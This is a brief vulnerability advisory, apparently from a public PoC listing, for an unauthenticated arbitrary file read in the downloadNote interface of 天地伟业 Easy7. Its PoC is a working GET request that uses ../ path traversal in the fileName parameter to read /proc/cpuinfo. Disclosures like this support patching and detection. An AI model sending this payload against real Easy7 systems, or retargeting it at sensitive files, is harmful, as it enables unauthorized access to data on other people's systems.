天地伟业Easy7 downloadNote 任意文件读取

2025-10-27 天地伟业Easy7 PoC Public

Description

天地伟业Easy7在特定接口存在任意文件读取,未授权用户可构造特殊请求读取系统内任意文件数据。

PoC

GET /Easy7/rest/file/downloadNote?fileName=../../../../../../proc/cpuinfo&fullName=cpuinfo HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities